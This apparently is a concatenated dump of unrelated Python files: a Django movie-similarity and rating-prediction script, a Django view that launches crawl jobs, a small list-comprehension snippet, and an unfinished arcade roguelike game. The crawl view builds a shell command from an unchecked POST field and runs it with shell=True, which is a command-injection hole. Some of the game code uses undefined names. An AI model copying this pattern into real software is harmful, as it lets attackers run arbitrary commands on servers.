a_set_about = set([item for sublist in a_list_about for item in sublist])
a_set_about = list(a_set_about)
a_set_movie_topics = set([item for sublist in a_list_movie_topics for item in sublist])
a_set_movie_topics = list(a_set_movie_topics)
if (a_set_genre):
a=0
for element in a_set_genre:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.genre:
movie_genre11=movie.genre.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_genre0 = a * (-1)
else:
set_difference_genre0 = 0
movie_1_vector.append(set_difference_genre0)
#print set_difference_genre0
if (a_set_sub_genre):
a=0
for element in a_set_sub_genre:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.sub_genre:
movie_genre11=movie.sub_genre.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+math.log(prob,2)
except ValueError:
a=0
set_difference_sub_genre0 = a * (-1)
else:
set_difference_sub_genre0 = 0
#print set_difference_sub_genre0
movie_1_vector.append(set_difference_sub_genre0)
if (a_set_director):
a=0
for element in a_set_director:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.director:
movie_genre11=movie.director.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_director0 = a * (-1)
else:
set_difference_director0 = 0
#print set_difference_director0
movie_1_vector.append(set_difference_director0)
if (a_set_based_on):
a=0
for element in a_set_based_on:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.based_on:
movie_genre11=movie.based_on.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_based_on0 = a * (-1)
else:
set_difference_based_on0 = 0
#print set_difference_based_on0
movie_1_vector.append(set_difference_based_on0)
if (a_set_about):
a=0
for element in a_set_about:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.about:
movie_genre11=movie.about.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_about0 = a * (-1)
else:
set_difference_about0 = 0
#print set_difference_about0
movie_1_vector.append(set_difference_about0)
''' ## If you want MORE to be used with full CAMO uncomment this and used it
if (a_set_movie_topics):
a=0
for element in a_set_movie_topics:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.movie_topics_lda:
movie_genre11=movie.movie_topics_lda.split(', ')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_movie_topics0 = a * (-1)
else:
set_difference_movie_topics0 = 0
movie_1_vector.append(set_difference_movie_topics0)
'''
for k in Movie_Details.objects.filter(id=new_range):
b_list_genre = []
b_list_sub_genre =[]
b_list_director =[]
b_list_based_on=[]
b_list_about =[]
b_list_movie_topics =[]
movie_2_vector = []
m2_string = k.genre
m2_genre = m2_string.split(',')
b_list_genre.append(m2_genre)
y2_string = k.sub_genre
m2_sub_genre = y2_string.split(',')
b_list_sub_genre.append(m2_sub_genre)
d2_string = k.director.encode('utf-8')
m2_director = d2_string.split(',')
b_list_director.append(m2_director)
ca2_string = k.cast.encode('utf-8')
m2_cast = ca2_string.split(',')
based_on2_string = k.based_on
m2_based_on = based_on2_string.split(',')
b_list_based_on.append(m2_based_on)
about2_string = k.about
m2_about = about2_string.split(',')
b_list_about.append(m2_about)
movie_topics_lda_string2 = str(k.movie_topics_lda)
movie_topics_lda2 = movie_topics_lda_string2.split(', ')
b_list_movie_topics.append(movie_topics_lda2)
rating2 = k.rating[:3]
#import pdb;pdb.set_trace()
b_set_genre = set([item for sublist in b_list_genre for item in sublist])
b_set_genre = list(b_set_genre)
b_set_sub_genre = set([item for sublist in b_list_sub_genre for item in sublist])
b_set_sub_genre = list(b_set_sub_genre)
b_set_director = set([item for sublist in b_list_director for item in sublist])
b_set_director = list(b_set_director)
b_set_based_on = set([item for sublist in b_list_based_on for item in sublist])
b_set_based_on = list(b_set_based_on)
b_set_about = set([item for sublist in b_list_about for item in sublist])
b_set_about = list(b_set_about)
b_set_movie_topics = set([item for sublist in b_list_movie_topics for item in sublist])
b_set_movie_topics = list(b_set_movie_topics)
# Finding the set difference a-b
#import pdb;pdb.set_trace()
#print set_difference_movie_topics0
if (b_set_genre):
a=0
for element in b_set_genre:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.genre:
movie_genre11=movie.genre.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_genre1 = a * (-1)
else:
set_difference_genre1 = 0
#import pdb;pdb.set_trace()
movie_2_vector.append(set_difference_genre1)
#print set_difference_genre0
if (b_set_sub_genre):
a=0
for element in b_set_sub_genre:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.sub_genre:
movie_genre11=movie.sub_genre.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+math.log(prob,2)
except ValueError:
a=0
set_difference_sub_genre1 = a * (-1)
else:
set_difference_sub_genre1 = 0
#print set_difference_sub_genre0
movie_2_vector.append(set_difference_sub_genre1)
#import pdb;pdb.set_trace()
if (b_set_director):
a=0
for element in b_set_director:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.director:
movie_genre11=movie.director.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_director1 = a * (-1)
else:
set_difference_director1 = 0
movie_2_vector.append(set_difference_director1)
#print set_difference_director0
if (b_set_based_on):
a=0
for element in b_set_based_on:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.based_on:
movie_genre11=movie.based_on.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_based_on1 = a * (-1)
else:
set_difference_based_on1 = 0
#print set_difference_based_on0
movie_2_vector.append(set_difference_based_on1)
if (b_set_about):
a=0
for element in b_set_about:
element_count=0
for movie in Movie_Details.objects.all():
#if b3 in q.genre.split(','):
if movie.about:
movie_genre11=movie.about.split(',')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/1103)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_about1 = a * (-1)
else:
set_difference_about1 = 0
#print set_difference_about0
movie_2_vector.append(set_difference_about1)
''' Uncomment this to use MORE with CAMO
if (b_set_movie_topics):
a=0
for element in b_set_movie_topics:
element_count=0
for st in it.chain(range(6,106), range(358,458), range(786,886)):
for movie in Movie_Details.objects.filter(id=st):
#if b3 in q.genre.split(','):
if movie.movie_topics_lda:
movie_genre11=movie.movie_topics_lda.split(', ')
if element in movie_genre11:
element_count=element_count+1
else:
element_count = 0
# for sd in movie_genre11:
try:
#print element,"====",element_count
prob=(element_count*1.0/300)
a=a+(math.log(prob,2))
except ValueError:
a=0
set_difference_movie_topics1 = a * (-1)
else:
set_difference_movie_topics1 = 0
movie_2_vector.append(set_difference_movie_topics1)
'''
from numpy import dot
from numpy.linalg import norm
from scipy import spatial
#cos_sim = dot(movie_1_vector, movie_2_vector)/(norm(movie_1_vector)*norm(movie_2_vector))
cos_sim = 1 - spatial.distance.cosine(movie_1_vector, movie_2_vector)
feature_dict[k.name.encode('utf-8')] = cos_sim
print k.id
print k.name.encode('utf-8')
print cos_sim
print i.name.encode('utf-8')
#import pdb;pdb.set_trace()
print '=================================================================================================='
import operator
sorted_x = sorted(feature_dict.items(), key=operator.itemgetter(1))
for m in Movie_Details.objects.filter(id=moviename):
m.movie_similarity_pearson_correlation = sorted_x
m.save()
print m.id
print m.name.encode('utf-8')
## Rating Prediction using MORE
mae=[]
movie_list_mae = [13] ## Write the name of the Movie ID
query_list = []
s=Reviewer_Profile.objects.raw('SELECT id,reviewer_name,reviewer_id, count(reviewer_id) FROM imdbrotten.app_imdb_reviewer_profile group by reviewer_id having count(reviewer_id) between 30 and 50;')
for k in s:
query_list.append(k.reviewer_id)
print query_list
for mov in movie_list_mae:
for q in query_list:
for rw in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
if rw.movie_ratings:
if rw.movie_name_id == mov:
list12=[]
simt_dict={}
user_movie=[]
user_movie1=[]
n22={}
movie_id={}
import ast
import operator
import itertools
from itertools import islice
for i in Movie_Details.objects.filter(id=mov):
new_dict=(i.movie_similarity_jaccard)
simt_dict = dict(list(ast.literal_eval(new_dict)))
sorted_x = sorted(simt_dict.items(), key=operator.itemgetter(1))
sorted_dict = dict(sorted_x[-30:])
print sorted_dict
#import pdb;pdb.set_trace()
for i in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
user_movie.append(i.movie_name_id)
print user_movie
for k in Movie_Details.objects.all():
for i in user_movie:
if k.id==i:
user_movie1.append(k.name)
#print user_movie1
n22 = {k: sorted_dict[k] for k in sorted_dict.viewkeys() & set(user_movie1)}
print n22
for b in Movie_Details.objects.all():
movie_id[b.name] = b.id
#print movie_id
flat_lis = dict((movie_id[key], value) for (key, value) in n22.items())
for r in flat_lis:
for s in Movie_Details.objects.filter(id=r):
print s.name
print ('\n')
mu = 6.12
user_rating_count = 0
no_of_movie = 0
for k in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
if k.movie_ratings:
no_of_movie = no_of_movie +1
user_rating_count = user_rating_count + int(k.movie_ratings[:-3])
bu = float(user_rating_count)/no_of_movie
if (mu>bu):
bu = mu - bu
bu=bu*(-1)
if (mu<bu):
bu=bu-mu
movie_rat = 0
count_movie = 0
for r in Movie_Details.objects.filter(id=mov):
'''
if r.movie_ratings:
count_movie = count_movie +1
movie_rat = movie_rat + int(r.movie_ratings[:1])
'''
bi = float(r.rating[:-3])
#bi = float(movie_rat)/count_movie
if (mu>bi):
bi = mu - bi
bi=bi*(-1)
if (mu<bi):
bi=bi-mu
total_similarity=0
count_loop = 0
sim_value = 0
if flat_lis:
for key, value in flat_lis.iteritems():
for k in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
if k.movie_ratings:
if (key == k.movie_name_id):
count_loop=count_loop+1
sim_value = sim_value +value
for bn in Movie_Details.objects.filter(id=key):
bj = float(bn.rating[:-3])
if (mu>bj):
bj = mu - bj
bj=bj*(-1)
if (mu<bj):
bj=bj-mu
total_similarity = total_similarity + (float(k.movie_ratings[:-3]) - (mu + bi + bu))
else:
count_loop = 1
if sim_value==0:
similarity_score = float(total_similarity)/1
else:
similarity_score = float(total_similarity)/sim_value
print rw.reviewer_name.encode('utf-8')
f=open('more_mmta_dbpedia.txt','a')
#f.write(rw.reviewer_id)
#f.write('\t')
f.write(rw.reviewer_name.encode('utf-8'))
f.write('\t')
f.write(rw.movie_ratings[:-3])
f.write('\t')
differ = float(int(rw.movie_ratings[:-3]) - (mu + bi + bu + similarity_score))
f.write(str(differ))
print differ
print mov
f.write('\n')
f.close() |
18,755 | d33f7a2e121d14bc1b63fa06ab5e1b22cf4e4713 | import subprocess
import time
from django.shortcuts import render, HttpResponse
from django.views.generic import View
from usa import STATES
from admincontrol.script_paths import *
class CrawlView(View):
template_name = 'crawl.html'
def get(self, request):
return render(request, self.template_name, {"states": STATES})
def post(self, request):
state = request.POST.get("state")
crawl_type = request.POST.get("crawl_type")
log_file_tag = str(int(time.time()))
log_file_name = "/home/arbisoft/logs/catest%s.txt" % log_file_tag
if crawl_type.lower() == 'favorites':
self.run_favorite_crawl(state, log_file_name)
return HttpResponse("control/log/%s" % log_file_tag)
def run_favorite_crawl(self, state, log_file_name):
args = "python %s -s %s > %s" % (FAVORITE_CRAWL_PATH, state, log_file_name)
# subprocess.Popen(args, shell=True, env={"PYTHONPATH": "/Users/omairshamshir/Documents/github/puctools/lib",
# "HOME": "/Users/omairshamshir"}, )
subprocess.Popen(args, shell=True)
time.sleep(5)
def run_weekly_crawl(self, state, log_file_name):
pass
|
18,756 | 28ef3a2044f37429158a0a7cbc38d994de6dd15c | adhoc=[1,2,3,1,4,5,66,22,2,6,0,9]
i=0
x=[i for i in adhoc if i>5]
print(x)
y=[z for z in adhoc if z>=2]
print(y) |
18,757 | d781c72a1d0f198e84b5b95ca368d6d0cb1e2c25 | import arcade
import numpy as np
import heapq
import tmx
import os
import timeit
import time
import io
from PIL import Image
rc = ROWS, COLS = (9, 16)
wh = WIDTH, HEIGHT = (64, 64)
sc = SCREEN_WIDTH, SCREEN_HEIGHT = (WIDTH * COLS, HEIGHT * ROWS)
list_maps = {}
array_maps = {}
current_map = 'test'
loc_array = {}
options_menu = ['Settings', 'Gameplay', 'Exit']
map_dir = [map_file for map_file in [map_file for map_file in os.listdir('./Maps') if os.path.isfile(os.path.join('./Maps', map_file))] if map_file.endswith('.tmx')]
img_dir = [img_file for img_file in os.listdir('./Images') if os.path.isfile(os.path.join('./Images', img_file))]
char_width = {' ': 24, '!': 16, '"': 32, '#': 48, '$': 32, '%': 32, '&': 48, "'": 16, '(': 24, ')': 24, '*': 32, '+': 32, ',': 16, '-': 32, '.': 16, '/': 32,
'0': 32, '1': 32, '2': 32, '3': 32, '4': 32, '5': 32, '6': 32, '7': 32, '8': 32, '9': 32, ':': 16, ';': 16, '<': 32, '=': 32, '>': 32, '?': 32,
'@': 48, 'A': 32, 'B': 32, 'C': 32, 'D': 32, 'E': 32, 'F': 32, 'G': 32, 'H': 32, 'I': 32, 'J': 32, 'K': 32, 'L': 32, 'M': 48, 'N': 32, 'O': 32,
'P': 32, 'Q': 32, 'R': 32, 'S': 32, 'T': 32, 'U': 32, 'V': 32, 'W': 48, 'X': 32, 'Y': 32, 'Z': 32, '[': 24, '\\': 32, ']': 24, '^': 32, '_': 32,
'`': 8, 'a': 32, 'b': 32, 'c': 32, 'd': 32, 'e': 32, 'f': 32, 'g': 32, 'h': 32, 'i': 16, 'j': 32, 'k': 32, 'l': 24, 'm': 48, 'n': 32, 'o': 32,
'p': 32, 'q': 32, 'r': 32, 's': 32, 't': 32, 'u': 32, 'v': 32, 'w': 48, 'x': 32, 'y': 32, 'z': 32, '{': 32, '|': 16, '}': 32, '~': 32}
movement_keys = {
'N': (arcade.key.NUM_8, arcade.key.W, arcade.key.UP, arcade.key.NUM_UP),
'NE': (arcade.key.NUM_9, arcade.key.NUM_PAGE_UP),
'E': (arcade.key.NUM_6, arcade.key.D, arcade.key.RIGHT, arcade.key.NUM_RIGHT),
'SE': (arcade.key.NUM_3, arcade.key.NUM_PAGE_DOWN),
'S': (arcade.key.NUM_2, arcade.key.S, arcade.key.DOWN, arcade.key.NUM_DOWN),
'SW': (arcade.key.NUM_1, arcade.key.NUM_END),
'W': (arcade.key.NUM_4, arcade.key.A, arcade.key.LEFT, arcade.key.NUM_4, arcade.key.NUM_LEFT),
'NW': (arcade.key.NUM_7, arcade.key.NUM_HOME),
'Inv': (arcade.key.E, arcade.key.TAB, arcade.key.NUM_ADD),
'Context': (arcade.key.SPACE, arcade.key.NUM_ENTER),
'Exit': (arcade.key.ESCAPE, ),
'Map': (arcade.key.M, arcade.key.NUM_DECIMAL),
}
for img in img_dir:
if '8x8' in img:
small = Image.open('./Images/{}'.format(img))
bigger = small.resize((small.size[0]*8, small.size[1]*8))
bigger.save('./Images/64x64{}'.format(img.split('8x8')[1]), 'PNG')
else:
img_name = img.split('.')[0]
cur_img = Image.open('./Images/{}'.format(img))
loc_array[img_name] = [[j, i, WIDTH, HEIGHT] for i in range(0, cur_img.size[1], WIDTH) for j in range(0, cur_img.size[0], HEIGHT)]
cur_img.close()
tile_set = arcade.draw_commands.load_textures('./Images/64x64Tile.png', loc_array['Tile'])
tile_set.insert(0, tile_set[-1])
font = arcade.draw_commands.load_textures('./Images/64x64Font.png', loc_array['Font'])
for map_name in map_dir:
map_file = tmx.TileMap.load('./Maps/{}'.format(map_name))
list_maps[map_name.split('.')[0]] = list(zip(*[[tile.gid for tile in layer.tiles] for layer in map_file.layers_list]))
array_maps[map_name.split('.')[0]] = [np.array([tile.gid for tile in layer.tiles]).reshape(map_file.height, map_file.width) for layer in map_file.layers_list]
def astar(start, goal, array=array_map[current_map][0]):
"""implementation of astar algorithm, neighbors can be
modified to allow for different movement sets."""
def heuristic(a, b):
return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
neighbors = [(0, 1), (0, -1), (1, 0), (-1, 0)]
close_set = set()
came_from = {}
gscore = {start: 0}
fscore = {start: heuristic(start, goal)}
oheap = []
heapq.heappush(oheap, (fscore[start], start))
while oheap:
current = heapq.heappop(oheap)[1]
if current == goal:
data = []
while current in came_from:
data.append(current)
current = came_from[current]
return data
close_set.add(current)
for pos_n_1, pos_n_2 in neighbors:
neighbor = current[0] + pos_n_1, current[1] + pos_n_2
tentative_g_score = gscore[current] + heuristic(current, neighbor)
if 0 <= neighbor[0] < array.shape[0]:
if 0 <= neighbor[1] < array.shape[1]:
if array[neighbor[0]][neighbor[1]] == 1:
continue
else:
continue
else:
continue
if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, 0):
continue
if tentative_g_score < gscore.get(neighbor, 0) or neighbor not in [pos_n_1[1] for pos_n_1 in oheap]:
came_from[neighbor] = current
gscore[neighbor] = tentative_g_score
fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)
heapq.heappush(oheap, (fscore[neighbor], neighbor))
return False
def roll_dice(s='1d'): # you might be thinking this has no reason to look so ugly, and you're right.
d = list(map(int, s.split('d')))
return sum(sorted(list(np.random.randint(1, d[1], d[0])))[d[-1] if len(d) > 2 else 0:]) if s != '1d' else np.random.randint(0, 1)
class Entity:
def __init__(self, yx=(0, 0), name=None, sprite=-1):
self.y, self.x = yx
self.name = name
self.sprite = sprite
@staticmethod
def name_list(in_list):
try:
return [list_element.name for list_element in in_list]
except AttributeError:
raise('{} does not have a name attribute'.format(in_list))
class Actor(Entity):
def __init__(self, yx, name, sprite, disposition, target_distance):
Entity.__init__(self, yx, name, sprite)
self.disposition = disposition
self.target_distance = target_distance
def move_me(self, goal):
if (abs(self.y-goal[0]) + abs(self.x-goal[1])) > self.target_distance: # i only want to calculate the path tree if need be
path = astar((self.y, self.x), goal, array_map[current_map][0])
if path:
self.y, self.x = path[-1]
elif self.y == goal[0] and self.x == goal[1]: # lazy implentation of moving AI out of the way, needs to be rewritten for different dispositions
if array_map[current_map][0][self.y + 1, self.x]:
self.y, self.x = self.y + 1, self.x
if array_map[current_map][0][self.y - 1, self.x]:
self.y, self.x = self.y - 1, self.x
if array_map[current_map][0][self.y, self.x + 1]:
self.y, self.x = self.y, self.x + 1
else:
self.y, self.x = self.y, self.x - 1
class Item(Entity):
def __init__(self, name, cost, weight, sprite, flavor_text=None):
Entity.__init__(self, name=name, sprite=sprite)
self.cost = cost
self.weight = weight
self.flavor_text = flavor_text
self.actions = ['Look', 'Drop']
def look(self):
return DialogItem(text=self.flavor_text, speaker=self.name)
def get_actions(self):
return [' {} '.format(action_element) for action_element in self.actions]
class EquipmentItem(Item):
def __init__(self, name, cost, weight, sprite):
Item.__init__(self, name=name, cost=cost, weight=weight, sprite=sprite)
self.actions.append('Equip')
class Armor(EquipmentItem):
def __init__(self, name, cost, weight, speed, asfc, armor_type, bonus, acp, max_bonus, sprite):
EquipmentItem.__init__(self, name, cost, weight, sprite)
self.armor_type = armor_type
self.speed = speed
self.asfc = asfc
self.armor_type = armor_type
self.bonus = bonus
self.acp = acp
self.cost = cost
self.max_bonus = max_bonus
self.body_position = ['Chest']
def __repr__(self):
return ' {} (+{})'.format(self.name, self.bonus)
def look(self):
return DialogItem(text='{} {} {}'.format(self.armor_type, self.asfc, self.bonus), speaker=self.name)
class Weapon(EquipmentItem):
def __init__(self, name, dmg, dmg_style, weight, weapon_type, cost, handed, crit_mult, dmg_range, weap_id, q=0):
self.weap_id = weap_id
self.q = q # 0 = Wood, 1 = Bronze, 2 = Iron, 3 = Steel, 4 = Green, 5 = Blue, 6 = Albanium
self.texture = self.q * 57 + 2052 + weap_id
EquipmentItem.__init__(self, name, cost, weight, self.texture)
self.dmg = dmg
self.dmg_style = dmg_style
self.weapon_type = weapon_type
self.handed = handed
self.crit_mult = crit_mult
self.dmg_range = dmg_range
self.body_position = ['Left Hand', 'Right Hand']
def __repr__(self):
return ' {} ({})'.format(self.name, self.dmg)
def look(self):
return DialogItem(text='({} - {}) {} {}-Handed, crit:{}'.format(self.dmg, self.dmg_style, self.weapon_type, 'Two'*bool(self.handed-1) or 'One', self.crit_mult), speaker=self.name)
class Gold:
def __init__(self, cost):
self.texture = [0, 0]
self.cost = (cost//64, cost % 64)
if self.cost[1] < 8:
self.texture[1] = 614
else:
self.texture[1] = 671
if self.cost[0] < 8:
self.texture[0] = 615
elif self.cost[0] < 64:
self.texture[0] = 672
elif self.cost[0] < 256:
self.texture[0] = 668
elif self.cost[0] < 512:
self.texture[0] = 669
else:
self.texture[0] = 670
def __repr__(self):
return '{}g {}s'.format(self.cost[0], self.cost[1])
class DialogItem(Entity):
def __init__(self, text=None, speaker=None, dialog_opts=None, yx=(0, 0), on_level=None, sprite=-1):
Entity.__init__(self, yx=yx, sprite=sprite)
self.speaker = speaker
if type(text) is str:
working_text = text.split()
len_line = 0
out_lines = []
line_data = 0
counter = 0
while counter < len(working_text) - 1:
for char in working_text[counter]:
len_line += char_width[char] // 8
len_line += 3 # spaces!
if len_line > 116: # width of the dialog box
out_lines.append(' '.join(working_text[line_data:counter]))
counter -= 1
len_line = 0
line_data = counter + 1
counter += 1
out_lines.append(' '.join(working_text[line_data:]))
self.text = out_lines
else:
self.text = text
self.dialog_opts = dialog_opts
def new_opt(self, newopt):
pass
def __repr__(self):
return 'Speaker: {}\nText: {}\nDialog Options: \n{}\n'.format(self.speaker, self.text, self.dialog_opts)
class Player(Entity):
def __init__(self):
Entity.__init__(self, yx=(71, 26), name=Player, sprite=1768)
self.gold = Gold(100)
self.stats = {
'Str': roll_dice('4d6d1'),
'Dex': roll_dice('4d6d1'),
'Int': roll_dice('4d6d1'),
'Wil': roll_dice('4d6d1'),
'Per': roll_dice('4d6d1'),
'HP': 8,
'FP': 0,
'XP': 0
}
self.inventory = []
self.equipped = {'Floating Left': None, 'Left Arm': None, 'Left Weapon': None, 'Left Ring One': None, 'Left Ring Two': None,
'Helmet': None, 'Shoulders': None, 'Chest': None, 'Gloves': None, 'Boots': None,
'Floating Right': None, 'Right Arm': None, 'Right Weapon': None, 'Right Ring One': None, 'Right Ring Two': None}
self.state = 'Walking'
@staticmethod
def get_bag(bag):
return [bag_item.name for bag_item in bag]
def equip_stats(self):
return [[str(eqp_item)] for eqp_item in self.equipped]
def get_stats(self):
return 'Str:{Str:02d} Dex:{Dex:02d} Int:{Int:02d} Wil:{Wil:02d} Per:{Per:02d}'.format(**self.stats).split()
def get_points(self):
return '{HP:02d} {FP:02d}'.format(**self.stats).split()
test_dia = DialogItem(sprite=34, text='''
At last I have the privilege of making public this third book of Marx's main work,
the conclusion of the theoretical part. When I published the second volume, in 1885,
I thought that except for a few, certainly very important, sections the third
volume would probably offer only technical difficulties. This was indeed the case.
But I had no idea at the time that these sections, the most important parts of the
entire work, would give me as much trouble as they did, just as I did not anticipate
the other obstacles, which were to retard completion of the work to such an extent.''',
speaker='Engels', yx=(73, 26), on_level='overworld')
other_test = DialogItem(sprite=456, text="got this far", speaker='Marie', yx=(73, 26), on_level='overworld')
BrokenDoor = DialogItem(sprite=345, text='Who is it?', dialog_opts={"Me": test_dia, "You": other_test}, speaker='Dick Allcocks from Man Island', yx=(73, 27), on_level='overworld')
BrDo2 = DialogItem(sprite=33,
dialog_opts={"What this?": BrokenDoor, "Why that?": BrokenDoor, "Who there?": BrokenDoor, "When it?": BrokenDoor},
speaker='Thine Momther', yx=(73, 27), on_level='overworld')
class Game(arcade.Window):
def __init__(self, width, height):
super().__init__(width, height)
self.last_input_time = 0
self.cur_time = 0
self.draw_time = 0
self.processing_time = 0
self.pressed_keys = self.pressed_keys
self.cur_opt = [0, 0]
self.opt_highlighted = False
self.inventory_screen = 0
self.cur_item = None
self.cur_text = None
self.p = Player()
self.switch_state(new_state='Walking', new_map=current_map)
self.actor1 = Actor(yx=(61, 26), name='Goast', sprite=909, disposition='Friendly', target_distance=1)
self.actor2 = Actor(yx=(71, 26), name='Victor', sprite=1781, disposition='Aggressive', target_distance=6)
self.actor_list = [self.actor1, self.actor2, BrDo2, test_dia]
self.p.inventory = []
self.game_step()
self.cur_health = [icon for sublist in [[1746] * (self.p.stats['HP'] // 2), [1747] * (self.p.stats['HP'] % 2 == 1)] for icon in sublist]
self.p.equipped = {'Floating Left': None, 'Left Arm': None, 'Left Weapon': None, 'Left Ring One': None, 'Left Ring Two': None,
'Helmet': None, 'Shoulders': None, 'Chest': None, 'Gloves': None, 'Boots': None,
'Floating Right': None, 'Right Arm': None, 'Right Weapon': None, 'Right Ring One': None, 'Right Ring Two': None}
def draw_base(self):
"""draw the main level, including the four key layers: Background : 1, Midground : 2, Sprites, and Foreground : 3, in that order."""
arcade.start_render()
for row in range(ROWS):
tile_width = WIDTH * row + 32
for col in range(COLS):
cur_tile = f_maps[current_map][(row + self.p.y - 4) * 16 + (col + self.p.x - 8)]
tile_height = HEIGHT * col + 32
for tile_layer in cur_tile:
if tile_layer:
arcade.draw_texture_rectangle(tile_height, tile_width, WIDTH, HEIGHT, tile_set[tile_layer])
def add_sprites(self):
np.copyto(array_map[current_map]['Sprite'], array_map[current_map]['Sprite Copy'])
for actor in self.actor_list:
array_map[current_map]['Sprite'][actor.y, actor.x] = actor
array_map[current_map]['Sprite'][self.p.y, self.p.x] = self.p
def on_draw(self):
draw_start_time = timeit.default_timer()
self.draw_base()
if self.p.state is 'Talking':
for row in range(ROWS):
for col in range(COLS):
self.gen_tile_array(array_map['dialog'], r_c=(row, col), yx=(0, 0.5))
self.gen_text(text=self.cur_text.text, speaker=self.cur_text.speaker, opts=self.cur_text.dialog_opts)
if self.p.state is 'Inventory':
for row in range(ROWS):
for col in range(COLS):
self.gen_tile_array(array_map['inventory'][self.inventory_screen], r_c=(row, col))
self.gen_inv()
if self.p.state is 'Walking':
for col in range(-(-self.p.stats['HP'] // 2)): # weird ass way of getting how many heart containers to draw
self.gen_lone_tile(self.cur_health[col], (0.5 + col, 8.5))
fps = 1 / (self.draw_time + self.processing_time)
if fps < 20:
cur_color = arcade.color.RED
elif fps < 60:
cur_color = arcade.color.WHITE
else:
cur_color = arcade.color.GREEN
arcade.draw_text('FPS: {}'.format(int(fps)), 20, SCREEN_HEIGHT - 80, cur_color, 16)
self.draw_time = timeit.default_timer() - draw_start_time
def switch_state(self, new_state, new_map=None):
self.cur_opt = [0, 0]
self.opt_highlighted = False
if new_state is 'Talking':
if self.cur_text.speaker:
array_map['dialog'][3] = [cur_tile for cur_row in [[0], [1564], [1565] * ((len(self.cur_text.speaker)) // 2 + 1), [1566], [0] * 15] for cur_tile in cur_row][:16]
else:
array_map['dialog'][3] = [0] * 16
if new_state is 'Walking':
pass
if new_state is 'Inventory':
self.inventory_screen = 0
self.p.state = new_state
if new_map:
array_map[new_map]['Sprite'] = np.zeros(shape=array_map[new_map][1].shape, dtype=Entity)
array_map[new_map]['Sprite Copy'] = array_map[new_map]['Sprite'][:]
def cursor(self, list_locs, yx):
y, x = yx
try:
list_locs[self.cur_opt[0]]
except IndexError:
self.cur_opt = [0, 0]
arcade.draw_texture_rectangle(x * WIDTH - 32, (y - list_locs[self.cur_opt[0]]) * HEIGHT, WIDTH, HEIGHT, tile_set[1481])
def gen_text(self, text=None, speaker=None, opts=None, yx=(2.25, 1), len_display=3):
y, x = yx
if speaker:
width_sum = 0
for char_pos, char in enumerate(speaker):
width_sum += char_width[speaker[char_pos-1]]
arcade.draw_texture_rectangle(width_sum+40, 216, WIDTH, HEIGHT, font[ord(char)])
if opts:
if type(opts) is not list:
opt_names = list(opts.keys())
else:
opt_names = opts
if text:
cursor_locs = np.arange(len(text), len(text) + len(opt_names))
else:
cursor_locs = np.arange(0, len(opt_names))
for item_pos, item in enumerate(opt_names[self.cur_opt[1]:self.cur_opt[1] + len_display]):
width_sum = 0
for char_pos, char in enumerate(item):
width_sum += char_width[item[char_pos - 1]]
arcade.draw_texture_rectangle(width_sum + x * WIDTH, (y - item_pos - int(text is not None)) * HEIGHT, WIDTH, HEIGHT, font[ord(char)])
self.cursor(cursor_locs, yx)
if text:
for line_pos, line in enumerate(text[self.cur_opt[1]:self.cur_opt[1]+len_display]):
width_sum = 0
for char_pos, char in enumerate(text[line_pos + self.cur_opt[1]]):
width_sum += char_width[text[line_pos + self.cur_opt[1]][char_pos - 1]]
